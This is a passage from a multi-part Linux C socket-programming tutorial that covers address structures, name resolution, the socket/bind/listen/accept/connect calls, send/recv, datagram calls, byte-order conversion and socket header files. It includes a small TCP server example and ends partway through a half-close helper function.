Note: Program examples if any, compiled using gcc on Linux Fedora Core 3 machine with several update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and theSELinux set to default configuration. Generic Socket Address Structure Host IP Addresses Each computer on the Internet has one or more Internet addresses, numbers which identify that computer among all those on the Internet. Users typically write numeric host addresses as sequences of four numbers, separated by periods, as in 128.54.46.100. Each computer also has one or more host names, which are strings of words separated by periods, as in www.google.com. Programs that let the user specify a host typically accept both numeric addresses and host names. But the program needs a numeric address to open a connection; to use a host name; you must convert it to the numeric address it stands for. Internet Host Addresses Abstract Host Address Each computer on the Internet has one or more Internet addresses, numbers which identify that computer among all those on the Internet. An Internet host address is a number containing four bytes of data. These are divided into two parts, a network number and a local network address number within that network. The network number consists of the first one, two or three bytes; the rest of the bytes are the local address.

Network numbers are registered with the Network Information Center (NIC), and are divided into three classes as discussed before: class A, B, and C for IPv4. The local network address numbers of individual machines are registered with the administrator of the particular network. Since a single machine can be a member of multiple networks, it can have multiple Internet host addresses. However, there is never supposed to be more than one machine with the same host address.

There are four forms of the standard numbers-and-dots notation for Internet addresses, as discussed before:

1. a.b.c.d - This specifies all four bytes of the address individually.
2. a.b.c - The last part of the address, c, is interpreted as a 2-byte quantity. This is useful for specifying host addresses in a Class B network with network address number a.b.
3. a.b - The last part of the address, b, is interpreted as a 3-byte quantity. This is useful for specifying host addresses in a Class A network with network address number a.
4. a - If only one part is given, this corresponds directly to the host address number.

Within each part of the address, the usual C conventions for specifying the radix apply. In other words, a leading '0x' or '0X' implies hexadecimal radix; a leading '0' implies octal; and otherwise decimal radix is assumed.

Host Address Data Type - Data type for a host number

Internet host addresses are represented in some contexts as integers (type unsigned long int). In other contexts, the integer is packaged inside a structure of type struct in_addr. It would be better if the usages were made consistent, but it is not hard to extract the integer from the structure or put the integer into a structure. On current systems the integer is the 32-bit type in_addr_t rather than a literal unsigned long int. The following basic definitions for Internet addresses appear in the header file 'netinet/in.h'.

struct in_addr
This data type is used in certain contexts to contain an Internet host address. It has just one field, named s_addr, which records the host address number as an unsigned long int.

unsigned long int INADDR_LOOPBACK
You can use this macro constant to stand for the ''address of this machine'' instead of finding its actual address. It is the Internet address '127.0.0.1', which is usually called 'localhost'. This special constant saves you the trouble of looking up the address of your own machine. Also, the system usually implements INADDR_LOOPBACK specially, avoiding any network traffic for the case of one machine talking to itself.

unsigned long int INADDR_ANY
You can use this macro constant to stand for ''any incoming address'' when binding to an address. This is the usual address to give in the sin_addr member of struct sockaddr_in when you want your server to accept Internet connections.

unsigned long int INADDR_BROADCAST
This macro constant is the address you use to send a broadcast message.

unsigned long int INADDR_NONE
This macro constant is returned by some functions to indicate an error.

Host Address Functions - Functions to operate on them

These additional functions for manipulating Internet addresses are declared in 'arpa/inet.h'. They represent Internet addresses in network byte order; they represent network numbers and local-address-within-network numbers in host byte order.

int inet_aton(const char *name, struct in_addr *addr)
This function converts the Internet host address name from the standard numbers-and-dots notation into binary data and stores it in the struct in_addr that addr points to. inet_aton returns nonzero if the address is valid, zero if not.

unsigned long int inet_addr(const char *name)
This function converts the Internet host address name from the standard numbers-and-dots notation into binary data. If the input is not valid, inet_addr returns INADDR_NONE. This is an obsolete interface to inet_aton, described above; it is obsolete because INADDR_NONE is a valid address (255.255.255.255), and inet_aton provides a cleaner way to indicate error return.

unsigned long int inet_network(const char *name)
This function extracts the network number from the address name, given in the standard numbers-and-dots notation. If the input is not valid, inet_network returns -1.

char * inet_ntoa(struct in_addr addr)
This function converts the Internet host address addr to a string in the standard numbers-and-dots notation. The return value is a pointer into a statically-allocated buffer. Subsequent calls will overwrite the same buffer, so you should copy the string if you need to save it.

struct in_addr inet_makeaddr(int net, int local)
This function makes an Internet host address by combining the network number net with the local-address-within-network number local.

int inet_lnaof(struct in_addr addr)
This function returns the local-address-within-network part of the Internet host address addr.

int inet_netof(struct in_addr addr)
This function returns the network number part of the Internet host address addr.

Host Names - Translating host names to host IP numbers

Besides the standard numbers-and-dots notation for Internet addresses, you can also refer to a host by a symbolic name. The advantage of a symbolic name is that it is usually easier to remember. For example, the machine with Internet address '128.52.46.32' is also known as 'testo.google.com'; and other machines in the 'google.com' domain can refer to it simply as 'testo'.

Internally, the system uses a database to keep track of the mapping between host names and host numbers. This database is usually either the file '/etc/hosts' or an equivalent provided by a name (DNS) server. The functions and other symbols for accessing this database are declared in 'netdb.h'. They are BSD features, defined unconditionally if you include 'netdb.h'.

Translating a host name to an IP address, and vice versa, is called name resolution. Apart from the hosts file, it is normally done by the Domain Name System (DNS); keep in mind that the same acronym is also read as Domain Name Service when it refers to the server that answers the queries. On UNIX/Linux the DNS server is commonly BIND, while Windows provides its own DNS service and may also use Microsoft-specific mechanisms such as WINS or the lmhosts file. The complete sequence of steps taken for name resolution is quite complex.
Data Type struct hostent

This data type is used to represent an entry in the hosts database. It has the following members:

Member                  Description
char *h_name            This is the ''official'' name of the host.
char **h_aliases        These are alternative names for the host, represented as a null-terminated vector of strings.
int h_addrtype          This is the host address type; in practice, its value is always AF_INET. In principle other kinds of addresses could be represented in the database as well as Internet addresses; if this were done, you might find a value in this field other than AF_INET.
int h_length            This is the length, in bytes, of each address.
char **h_addr_list      This is the vector of addresses for the host. Recall that the host might be connected to multiple networks and have addresses on each one. The vector is terminated by a null pointer.
char *h_addr            This is a synonym for h_addr_list[0]; in other words, it is the first host address.

Table 5

As far as the host database is concerned, each address is just a block of memory h_length bytes long. But in other contexts there is an implicit assumption that you can convert this to a struct in_addr or an unsigned long int. Host addresses in a struct hostent structure are always given in network byte order. You can use gethostbyname() or gethostbyaddr() to search the hosts database for information about a particular host. The information is returned in a statically-allocated structure, so you must copy the information if you need to save it across calls.
struct hostent * gethostbyname(const char *name)

The gethostbyname() function returns information about the host named name. If the lookup fails, it returns a null pointer.
struct hostent * gethostbyaddr(const char *addr, int length, int format)

The gethostbyaddr() function returns information about the host with Internet address addr. The length argument is the size (in bytes) of the address at addr. format specifies the address format; for an Internet address, specify a value of AF_INET. If the lookup fails, gethostbyaddr() returns a null pointer. If the name lookup by gethostbyname() or gethostbyaddr() fails, you can find out the reason by looking at the value of the variable h_errno. Before using h_errno, you must declare it like this:
extern int h_errno;

Here are the error codes that you may find in h_errno:

h_errno             Description
HOST_NOT_FOUND      No such host is known in the database.
TRY_AGAIN           This condition happens when the name server could not be contacted. If you try again later, you may succeed then.
NO_RECOVERY         A non-recoverable error occurred.
NO_ADDRESS          The host database contains an entry for the name, but it doesn't have an associated Internet address.

Table 6

You can also scan the entire hosts database one entry at a time using sethostent(), gethostent(), and endhostent(). Be careful in using these functions, because they are not reentrant.
Function void sethostent(int stayopen)

This function opens the hosts database to begin scanning it. You can then call gethostent() to read the entries. If the stayopen argument is nonzero, this sets a flag so that subsequent calls to gethostbyname() or gethostbyaddr() will not close the database (as they usually would). This makes for more efficiency if you call those functions several times, by avoiding reopening the database for each call.
Function struct hostent * gethostent()

This function returns the next entry in the hosts database. It returns a null pointer if there are no more entries.
Function void endhostent()

This function closes the hosts database.

The API Details

In this section and the ones that follow we will discuss the details of the socket APIs: the structures, functions, macros and types.

struct sockaddr

    struct sockaddr {
        u_char  sa_len;
        u_short sa_family;     // address family, AF_xxx
        char    sa_data[14];   // 14 bytes of protocol address
    };

sockaddr consists of the following parts:

1. The short integer that defines the address family (the value that is specified for address family on the socket() call).
2. Fourteen bytes that are reserved to hold the address itself.

Originally sa_len was not there; it was added in 4.4BSD, and the Linux definition of struct sockaddr does not have it. Depending on the address family, sa_data could be a file name or a socket endpoint. sa_family can be a variety of things, but it'll be AF_INET for everything we do in this Tutorial. sa_data contains a destination address and port number for the socket. This is rather unwieldy since you don't want to tediously pack the address in the sa_data by hand. To deal with struct sockaddr, programmers created a parallel structure: struct sockaddr_in ("in" for "Internet").

struct sockaddr_in

    struct sockaddr_in {
        u_char         sin_len;
        u_short        sin_family;   // Address family
        u_short        sin_port;     // Port number
        struct in_addr sin_addr;     // Internet or IP address
        char           sin_zero[8];  // Same size as struct sockaddr
    };

The sin_family field is the address family (always AF_INET for TCP and UDP over IPv4). The sin_port field is the port number, and the sin_addr field is the Internet address. The sin_zero field is reserved, and you must set it to zeroes. The data type struct in_addr, described earlier, has just one field, named s_addr, which records the host address number.

sockaddr_in is a "specialized" sockaddr, and a pointer to it is cast to struct sockaddr * when it is passed to the socket calls. sin_addr could be a u_long. sin_addr is 4 bytes and the 8 bytes of sin_zero are unused. sockaddr_in is used to specify an endpoint. The sin_port and sin_addr must be in Network Byte Order.

Socket System Calls

socket()

NAME
    socket() - create an endpoint for communication

SYNOPSIS
    #include <sys/types.h>
    #include <sys/socket.h>

    int socket(int domain, int type, int protocol);

domain should be set to "AF_INET", just like in the struct sockaddr_in. The type argument tells the kernel what kind of socket this is, for example SOCK_STREAM or SOCK_DGRAM. Just set protocol to "0" to have socket() choose the correct protocol based on the type; protocol is frequently 0 because only one protocol in the family supports the specified type. You can look at /etc/protocols for the protocol numbers. There are many more domains and types that you will find later on. Also, there's a "better" way to get the protocol: see the getprotobyname() man page.

socket() simply returns to you an integer socket descriptor that you can use in later system calls, or -1 on error. The global variable errno is set to the error's value (see the perror() man page).

In some documentation, you'll see mention of a mystical "PF_INET". Once, a long time ago, it was thought that maybe an address family (what the "AF" in "AF_INET" stands for) might support several protocols that were referenced by their protocol family (what the "PF" in "PF_INET" stands for). That didn't happen. So the correct thing to do is to use AF_INET in your struct sockaddr_in and PF_INET in your call to socket(). But practically speaking, you can use AF_INET everywhere.

NETWORK PROGRAMMING LINUX SOCKET PART 4: THE APPLICATION PROGRAMMING INTERFACES (APIs)
listen()

NAME
    listen() - listen for connections on a socket

SYNOPSIS
    #include <sys/socket.h>

    int listen(int sockfd, int backlog);

sockfd is the usual socket file descriptor from the socket() system call. backlog is the number of connections allowed on the incoming queue. As an example, for the server, if you want to wait for incoming connections and handle them in some way, the steps are: first you listen(), then you accept(). The incoming connections are going to wait in this queue until you accept() them (explained later), and backlog is the limit on how many can queue up. Again, as per usual, listen() returns -1 and sets errno on error.

We need to call bind() before we call listen() or the kernel will have us listening on a random port. So if you're going to be listening for incoming connections, the sequence of system calls you'll make is something like this:

    socket();
    bind();
    listen();
    /* accept() goes here */

accept()

NAME
    accept() - accept a connection on a socket

SYNOPSIS
    #include <sys/types.h>
    #include <sys/socket.h>

    int accept(int sockfd, struct sockaddr *addr, int *addrlen);

sockfd is the listen()ing socket descriptor. addr will usually be a pointer to a local struct sockaddr_in. This is where the information about the incoming connection will go (and with it you can determine which host is calling you from which port). addrlen is a local integer variable that should be set to sizeof(struct sockaddr_in) before its address is passed to accept(). Current headers declare this parameter as socklen_t *, so the variable should be declared as socklen_t. accept() will not put more than that many bytes into addr. If it puts fewer in, it'll change the value of addrlen to reflect that. accept() returns -1 and sets errno if an error occurs.

Basically, after listen(), a server calls accept() to wait for the next client to connect. accept() will create a new socket to be used for I/O with the new client. The server will then continue to do further accepts with the original sockfd. When someone tries to connect() to your machine on a port that you are listen()ing on, their connection will be queued up waiting to be accepted. You call accept() and you tell it to get the pending connection. It'll return to you a new socket file descriptor to use for this single connection. Then you will have two socket file descriptors, where the original one is still listening on your port and the newly created one is finally ready to send() and recv(). The following is a program example that demonstrates the use of the previous functions.

[bodo@bakawali testsocket]$ cat test3.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* the port users will be connecting to */
#define MYPORT 3440
/* how many pending connections queue will hold */
#define BACKLOG 10

int main()
{
    /* listen on sock_fd, new connection on new_fd */
    int sockfd, new_fd;
    /* my address information, address where I run this program */
    struct sockaddr_in my_addr;
    /* remote address information */
    struct sockaddr_in their_addr;
    socklen_t sin_size;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd == -1)
    {
        perror("socket() error lol!");
        exit(1);
    }
    else
        printf("socket() is OK...\n");

    /* host byte order */
    my_addr.sin_family = AF_INET;
    /* short, network byte order */
    my_addr.sin_port = htons(MYPORT);
    /* auto-fill with my IP */
    my_addr.sin_addr.s_addr = INADDR_ANY;
    /* zero the rest of the struct */
    memset(&(my_addr.sin_zero), 0, 8);

    if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("bind() error lol!");
        exit(1);
    }
    else
        printf("bind() is OK...\n");

    if(listen(sockfd, BACKLOG) == -1)
    {
        perror("listen() error lol!");
        exit(1);
    }
    else
        printf("listen() is OK...\n");

    /* ...other codes to read the received data... */
    sin_size = sizeof(struct sockaddr_in);
    new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
    if(new_fd == -1)
        perror("accept() error lol!");
    else
        printf("accept() is OK...\n");

    /*.....other codes.......*/
    close(new_fd);
    close(sockfd);
    return 0;
}

[bodo@bakawali testsocket]$ gcc test3.c -o test3
[bodo@bakawali testsocket]$ ./test3
socket() is OK...
bind() is OK...
listen() is OK...

The program then blocks in accept() until a client connects. Note that we will use the socket descriptor new_fd for all send() and recv() calls. If you're only getting one single connection ever, you can close() the listening sockfd in order to prevent more incoming connections on the same port, if you so desire.

send()

    int send(int sockfd, const void *msg, int len, int flags);

sockfd is the socket descriptor you want to send data to (whether it's the one returned by socket() or the new one you got with accept()). msg is a pointer to the data you want to send. len is the length of that data in bytes. Just set flags to 0. (See the send() man page for more information concerning flags.) Some sample code might be:

    char *msg = "I was here!";
    int len, bytes_sent;
    ...
    ...
    len = strlen(msg);
    bytes_sent = send(sockfd, msg, len, 0);
    ...

send() returns the number of bytes actually sent out, and this might be less than the number you told it to send. Sometimes you tell it to send a whole gob of data and it just can't handle it. It'll fire off as much of the data as it can, and trust you to send the rest later. Remember, if the value returned by send() doesn't match the value in len, it's up to you to send the rest of the string. If the packet is small (less than 1K or so) it will probably manage to send the whole thing all in one go. Again, -1 is returned on error, and errno is set to the error number.

recv()
The recv() call is similar in many respects:

    int recv(int sockfd, void *buf, int len, unsigned int flags);

sockfd is the socket descriptor to read from, buf is the buffer to read the information into and len is the maximum length of the buffer. flags can again be set to 0. See the recv() man page for flag information. recv() returns the number of bytes actually read into the buffer, or -1 on error (with errno set accordingly). If recv() returns 0, this can mean only one thing: the remote side has closed the connection on you. A return value of 0 is recv()'s way of letting you know this has occurred.

At this stage you can pass data back and forth on stream sockets. These two functions, send() and recv(), are for communicating over stream sockets or connected datagram sockets. If you want to use regular unconnected datagram sockets (UDP), you need to use sendto() and recvfrom(). Or you can use the more general, normal file system functions, write() and read().

write()

NAME
    write() - write to a file descriptor

SYNOPSIS
    #include <unistd.h>

    ssize_t write(int fd, const void *buf, size_t count);

Writes to files, devices, sockets etc. Normally data is copied to a system buffer and the write occurs asynchronously. If the buffers are full, write() can block.

read()

NAME
    read() - read from a file descriptor

SYNOPSIS
    #include <unistd.h>

    ssize_t read(int fd, void *buf, size_t count);

Reads from files, devices, sockets etc. If a socket has data available, up to count bytes are read. If no data is available, the read blocks. If fewer than count bytes are available, read() returns what it can without blocking. For UDP, data is read in whole or partial datagrams. If you read part of a datagram, the rest is discarded.

close() and shutdown()

NAME
    close() - close a file descriptor

SYNOPSIS
    #include <unistd.h>

    int close(int sockfd);

You can just use the regular UNIX file descriptor close() function:

    close(sockfd);

This will prevent any more reads and writes to the socket. Anyone attempting to read or write the socket on the remote end will receive an error. UNIX keeps a count of the number of uses for an open file or device. close() decrements the use count. If the use count reaches 0, the file or device is closed.

Just in case you want a little more control over how the socket closes, you can use the shutdown() function. It allows you to cut off communication in a certain direction, or both ways just like close() does. The prototype:

    int shutdown(int sockfd, int how);

sockfd is the socket file descriptor you want to shut down, and how is one of the following:

1. 0 (SHUT_RD) - Further receives are disallowed.
2. 1 (SHUT_WR) - Further sends are disallowed.
3. 2 (SHUT_RDWR) - Further sends and receives are disallowed (like close()).

shutdown() returns 0 on success, and -1 on error (with errno set accordingly). If you deign to use shutdown() on unconnected datagram sockets, it will simply make the socket unavailable for further send() and recv() calls (remember that you can use these if you connect() your datagram socket). It's important to note that shutdown() doesn't actually close the file descriptor, it just changes its usability. To free a socket descriptor, you need to use close().

NETWORK PROGRAMMING LINUX SOCKET PART 5: APIs & HEADER FILES


sendto() and recvfrom() for DATAGRAM (UDP)

Since datagram sockets aren't connected to a remote host, we need to give the destination address before we send a packet. The prototype is:

    int sendto(int sockfd, const void *msg, int len, unsigned int flags, const struct sockaddr *to, int tolen);

This call is basically the same as the call to send() with the addition of two other pieces of information. to is a pointer to a struct sockaddr (which you'll probably have as a struct sockaddr_in and cast at the last minute) which contains the destination IP address and port. tolen can simply be set to sizeof(struct sockaddr). Just like with send(), sendto() returns the number of bytes actually sent (which, again, might be less than the number of bytes you told it to send!), or -1 on error.

Equally similar are recv() and recvfrom(). The prototype of recvfrom() is:

    int recvfrom(int sockfd, void *buf, int len, unsigned int flags, struct sockaddr *from, int *fromlen);

Again, this is just like recv() with the addition of a couple of fields. from is a pointer to a local struct sockaddr that will be filled with the IP address and port of the originating machine. fromlen is a pointer to a local int that should be initialized to sizeof(struct sockaddr). When the function returns, fromlen will contain the length of the address actually stored in from. recvfrom() returns the number of bytes received, or -1 on error (with errno set accordingly).

Remember, if you connect() a datagram socket, you can then simply use send() and recv() for all your transactions. The socket itself is still a datagram socket and the packets still use UDP, but the socket interface will automatically add the destination and source information for you.

A sample of the client socket call flow

    socket()
    connect()
    while (x)
    {
        write()
        read()
    }
    close()

A sample of the server socket call flow

    socket()
    bind()
    listen()
    while (1)
    {
        accept()
        while (x)
        {
            read()
            write()
        }
        close()
    }
    close()

Network Integers versus Host Integers

The little endian and big endian issue arises from the use of different processor architectures. Integers are usually stored either most-significant byte first or least-significant byte first. On Intel based machines the hex value 0x01020304 would be stored in 4 successive bytes as: 04, 03, 02, 01. This is little endian.

On a most-significant-byte-first (MSB-first, big endian) machine (IBM RS6000), this would be: 01, 02, 03, 04. It is important to use network byte order (MSB-first), and the conversion functions available for this task are listed below:

htons()     Host to network short.
ntohs()     Network to host short.
htonl()     Host to network long.
ntohl()     Network to host long.

Table 7

Use these functions to write portable network code.

Fortunately for you, there are a bunch of functions that allow you to manipulate IP addresses. No need to figure them out by hand and stuff them in a long with the << operator. First, let's say you have a:

    struct sockaddr_in ina;

And you have an IP address "10.12.110.57" that you want to store into it. The function you want to use, inet_addr(), converts an IP address in numbers-and-dots notation into an unsigned long. The assignment can be made as follows:

    ina.sin_addr.s_addr = inet_addr("10.12.110.57");

Notice that inet_addr() returns the address in Network Byte Order already, so you don't have to call htonl(). Now, the above code snippet isn't very robust because there is no error checking. inet_addr() returns -1 on error. For binary numbers, (unsigned)-1 just happens to correspond to the IP address 255.255.255.255! That's the broadcast address! Remember to do your error checking properly.

Actually, there's a cleaner interface you can use instead of inet_addr(): it's called inet_aton() ("aton" means "ascii to network"):

    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int inet_aton(const char *cp, struct in_addr *inp);

A sample usage, while packing a struct sockaddr_in, is shown below:

    struct sockaddr_in my_addr;

    /* host byte order */
    my_addr.sin_family = AF_INET;
    /* short, network byte order */
    my_addr.sin_port = htons(MYPORT);
    inet_aton("10.12.110.57", &(my_addr.sin_addr));
    /* zero the rest of the struct */
    memset(&(my_addr.sin_zero), 0, 8);

inet_aton(), unlike practically every other socket-related function, returns nonzero on success, and zero on failure. The address is passed back in inp. Unfortunately, not all platforms implement inet_aton() so, although its use is preferred, normally the older, more common inet_addr() is used.

All right, now you can convert string IP addresses to their binary representations. What about the other way around? What if you have a struct in_addr and you want to print it in numbers-and-dots notation? In this case, you'll want to use the function inet_ntoa() ("ntoa" means "network to ascii"), something like this:

    printf("%s", inet_ntoa(ina.sin_addr));

That will print the IP address. Note that inet_ntoa() takes a struct in_addr as an argument, not a long. Also notice that it returns a pointer to a char. This points to a statically stored char array within inet_ntoa(), so each time you call inet_ntoa() it will overwrite the last IP address you asked for. For example:

    char *a1, *a2;
    ...
    ...
    a1 = inet_ntoa(ina1.sin_addr); /* this is 192.168.4.1 */
    a2 = inet_ntoa(ina2.sin_addr); /* this is 10.11.110.55 */
    printf("address 1: %s\n", a1);
    printf("address 2: %s\n", a2);

Will print:

    address 1: 10.11.110.55
    address 2: 10.11.110.55

If you need to save the address, strcpy() it to your own character array.

---------------------------------------------------SOME SUMMARY---------------------------------------------

Let's see what we have covered till now.

Socket Library Functions

System calls:
1. Startup / close.
2. Data transfer.
3. Options control.
4. Other.

Network configuration lookup:
1. Host address.
2. Ports for services.
3. Other.

Utility functions:
1. Data conversion.
2. Address manipulation.
3. Error handling.

Primary Socket Calls

socket()      Create a new socket and return its descriptor.
bind()        Associate a socket with a port and address.
listen()      Establish queue for connection requests.
accept()      Accept a connection request.
connect()     Initiate a connection to a remote host.
recv()        Receive data from a socket descriptor.
send()        Send data to a socket descriptor.
read()        Reads from files, devices, sockets etc.
write()       Writes to files, devices, sockets etc.
close()       Close a socket descriptor and free it.
shutdown()    One-way close of a socket descriptor. Allows you to cut off communication in a certain direction, or both ways just like close() does.

Table 8

Network Database Administration functions

1. gethostbyname() - given a hostname, returns a structure which specifies its DNS name(s) and IP address(es).
2. getservbyname() - given a service name and protocol, returns a structure which specifies its name(s) and its port address.
3. gethostname() - returns the hostname of the local host.
4. getservbyname(), getservbyport(), getservent().
5. getprotobyname(), getprotobynumber(), getprotoent().
6. getnetbyname(), getnetbyaddr(), getnetent().

Socket Utility Functions

ntohs()/ntohl()           Convert short/long from network byte order (big endian) to host byte order.
htons()/htonl()           Convert short/long from host byte order to network byte order.
inet_ntoa()/inet_addr()   Convert a 32-bit IP address (network byte order) to/from a dotted decimal string.
perror()                  Print error message (based on errno) to stderr.
herror()                  Print error message for gethostbyname() to stderr (used with DNS).

Table 9

Primary Header Files

Include file sequence may affect processing (order is important!). Other header files that define macros, data types, structures and functions are given in the summary Table at the end of this Tutorial.

<sys/types.h>     Prerequisite typedefs.
<errno.h>         Names for errno values (error numbers).
<sys/socket.h>    struct sockaddr; system prototypes and constants.
<netdb.h>         Network info lookup prototypes and structures.
<netinet/in.h>    struct sockaddr_in; byte ordering macros.
<arpa/inet.h>     Utility function prototypes.

Table 10

Ancillary Socket Topics

UDP versus TCP.
Controlling/managing socket characteristics:
1. get/setsockopt() - keepalive, reuse, nodelay.
2. fcntl() - async signals, blocking.
3. ioctl() - file, socket, routing, interface options.
Blocking versus Non-blocking socket.
Signal based socket programming (SIGIO).
Implementation specific functions.

Socket header files

Programs that use the socket functions must include one or more header files that contain information that is needed by the functions, such as:

1. Macro definitions.
2. Data type definitions.
3. Structure definitions.
4. Function prototypes.

The following Table is a summary of the header files used in conjunction with the socket APIs. However, different kernel versions will have slightly different header files and paths as well. Please refer to the online Linux source code repository for the desired kernel version.

File name               Description
<arpa/inet.h>           Defines prototypes for those network library routines that convert Internet address and dotted-decimal notation, for example, inet_makeaddr().
<arpa/nameser.h>        Defines Internet name server macros and structures that are needed when the system uses the resolver routines.
<errno.h>               Defines macros and variables for error reporting.
<fcntl.h>               Defines prototypes, macros, variables, and structures for control-type functions, for example, fcntl().
<net/if.h>              Defines prototypes, macros, variables, and the ifreq and ifconf structures that are associated with ioctl() requests that affect interfaces.
<net/route.h>           Defines prototypes, macros, variables, and the rtentry and rtconf structures that are associated with ioctl() requests that affect routing entries.
<netdb.h>               Contains data definitions for the network library routines. Defines the following structures: hostent and hostent_data, netent and netent_data, servent and servent_data, protoent and protoent_data.
<netinet/in.h>          Defines prototypes, macros, variables, and the sockaddr_in structure to use with Internet domain sockets.
<netinet/ip.h>          Defines macros, variables, and structures that are associated with setting IP options.
<netinet/ip_icmp.h>     Defines macros, variables, and structures that are associated with the Internet Control Message Protocol (ICMP).
<netinet/tcp.h>         Defines macros, variables, and structures that are associated with setting TCP options.
<netns/idp.h>           Defines IPX packet header. May be needed in AF_NS socket applications.
<netns/ipx.h>           Defines ioctl structures for IPX ioctl() requests. May be needed in AF_NS socket applications.
<netns/ns.h>            Defines AF_NS socket structures and options. You must include this file in AF_NS socket applications.
<netns/sp.h>            Defines SPX packet header. May be needed in AF_NS socket applications.
<nettel/tel.h>          Defines sockaddr_tel structure and related structures and macros. You must include this file in AF_TELEPHONY applications.
<resolv.h>              Contains macros and structures that are used by the resolver routines.
<ssl.h>                 Defines Secure Sockets Layer (SSL) prototypes, macros, variables, and the following structures: SSLInit, SSLHandle.
<sys/ioctl.h>           Defines prototypes, macros, variables, and structures for I/O control-type functions, for example, ioctl().
<sys/param.h>           Defines some limits to system fields, in addition to miscellaneous macros and prototypes.
<sys/signal.h>          Defines additional macros, types, structures, and functions that are used by signal routines.
<sys/socket.h>          Defines socket prototypes, macros, variables, and the following structures: sockaddr, msghdr, linger. You must include this file in all socket applications.
<sys/time.h>            Defines prototypes, macros, variables, and structures that are associated with time functions.
<sys/types.h>           Defines various data types. Also includes prototypes, macros, variables, and structures that are associated with the select() function. You must include this file in all socket applications.
<sys/uio.h>             Defines prototypes, macros, variables, and structures that are associated with I/O functions.
<sys/un.h>              Defines prototypes, macros, variables, and the sockaddr_un structure to use with UNIX domain sockets.
<unistd.h>              Contains macros and structures that are defined by the integrated file system. Needed when the system uses the read() and write() system functions.

Table 11: Header files for Linux sockets APIs

NETWORK PROGRAMMING LINUX SOCKET PART 6: THE APIs


This is a continuation of the Part I series, Introduction to Socket Programming. Working program examples, if any, were compiled using gcc, tested using public IPs, and run on Linux/Fedora Core 3, with several updates applied, as a normal user. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration.

The abilities that are supposed to be acquired:

Able to understand and use the Unix / Linux C language socket APIs.
Able to understand and implement several simple TCP and UDP client and server basic designs.

Client Design Consideration

Some of the information in this section is a repetition from the previous one.

Identifying a Server's Address

A server's IP address must be used in connect().
Usually the name is used to get the address.
The name could be in the code, for example mailhost for an email program.
The user could specify the name; this is common because it is flexible and simple.
The name or address could be in a file.
The client can broadcast on the network to ask for a server.

The following is an example of telneting to the telserv.test.com server through the standard telnet port 23:

telnet telserv.test.com

Or using the IP address of the telnet server:

telnet 131.95.115.204

Client software typically allows either names or numbers. Ports usually have a default value in the code if not explicitly mentioned.

Looking Up a Computer Name

NAME
gethostbyname() - get network host entry

SYNOPSIS
#include <netdb.h>
extern int h_errno;
struct hostent *gethostbyname(const char *name);

struct hostent {
    char *h_name;
    char **h_aliases;
    int h_addrtype;
    int h_length;
    char **h_addr_list;
};
#define h_addr h_addr_list[0]

name could be a name or a dotted decimal address.
Hosts can have many names in h_aliases.
Hosts can have many addresses in h_addr_list.
Addresses in h_addr_list are not strings; they are network byte order addresses, ready to copy and use.

Looking Up a Port Number by Name

NAME
getservbyname() - get service entry

SYNOPSIS
#include <netdb.h>
struct servent *getservbyname(const char *name, const char *proto);

struct servent {
    char *s_name;
    char **s_aliases;
    int s_port;
    char *s_proto;
};

s_port: port number for the service, given in network byte order.

Looking Up a Protocol by Name

NAME
getprotobyname() - get protocol entry

SYNOPSIS
#include <netdb.h>
struct protoent *getprotobyname(const char *name);

struct protoent {
    char *p_name;
    char **p_aliases;
    int p_proto;
};

p_proto: the protocol number (can be used in the socket call).

getpeername()

The function getpeername() tells you who is at the other end of a connected stream socket. The prototype:

#include <sys/socket.h>
int getpeername(int sockfd, struct sockaddr *addr, socklen_t *addrlen);

sockfd is the descriptor of the connected stream socket.
addr is a pointer to a struct sockaddr (or a struct sockaddr_in) that will hold the information about the other side of the connection.
addrlen is a pointer to a socklen_t, which should be initialized to sizeof(struct sockaddr).
The function returns -1 on error and sets errno accordingly.

Once you have their address, you can use inet_ntoa() or gethostbyaddr() to print or get more information.

Allocating a Socket

#include <sys/types.h>
#include <sys/socket.h>
int s;
s = socket(PF_INET, SOCK_STREAM, 0);

With PF_INET and SOCK_STREAM, a protocol argument of 0 selects the default protocol for that combination, which is TCP.

Choosing a Local Port Number

The server will be using a well-known port.
The client's port does not need to be known in advance; the server learns it from the incoming connection.
You could bind to a random port above 1023.
A simpler choice is to leave out the bind call. connect() will choose a local port if required.

Connecting to a Server with TCP

NAME
connect - initiate a connection on a socket

SYNOPSIS
#include <sys/types.h>
#include <sys/socket.h>
int connect(int s, const struct sockaddr *serv_addr, socklen_t addrlen);

RETURN VALUE
If the connection or binding succeeds, zero is returned. On error, -1 is returned, and errno is set appropriately.

We will use a sockaddr_in structure (cast to struct sockaddr *). After connect, s is available to read/write.

Communicating with TCP

Code segment example:

char *req = "send cash";
char buf[100], *b;
int left, n;

write(s, req, strlen(req));
left = 100;
b = buf;
/* read into b, not buf, so each chunk lands after the previous one */
while (left && (n = read(s, b, left)) > 0) {
    b += n;
    left -= n;
}

The client and server cannot know how many bytes are sent in each write.
Delivered chunks are not always the same size as in the original write.
Reads must be handled in a loop to cope with stream sockets.

Closing a TCP Connection

In the simplest case close works well.
Sometimes it is important to tell the server that a client will send no more requests, while still keeping the socket available for reading.

res = shutdown(s, 1);

The 1 (the value of SHUT_WR) means no more writes will happen.
The server detects end of file on the socket.
After the server sends all the replies it can close.
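The half-close described above can be sketched as a pair of small helpers. This is only an illustration under stated assumptions: the function names request_then_half_close() and drain_then_reply() are hypothetical, and the request is assumed short enough to go out in a single write().

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Client side: send one request, announce "no more writes" with
 * shutdown(), then collect the reply until the server closes.
 * Returns the number of reply bytes stored, or -1 on error. */
ssize_t request_then_half_close(int s, const char *req, char *reply, size_t cap)
{
    size_t len = strlen(req), got = 0;
    ssize_t n = 0;

    if (write(s, req, len) != (ssize_t)len)
        return -1;
    if (shutdown(s, SHUT_WR) < 0)          /* SHUT_WR has the value 1 */
        return -1;
    while (got < cap && (n = read(s, reply + got, cap - got)) > 0)
        got += (size_t)n;
    return n < 0 ? -1 : (ssize_t)got;
}

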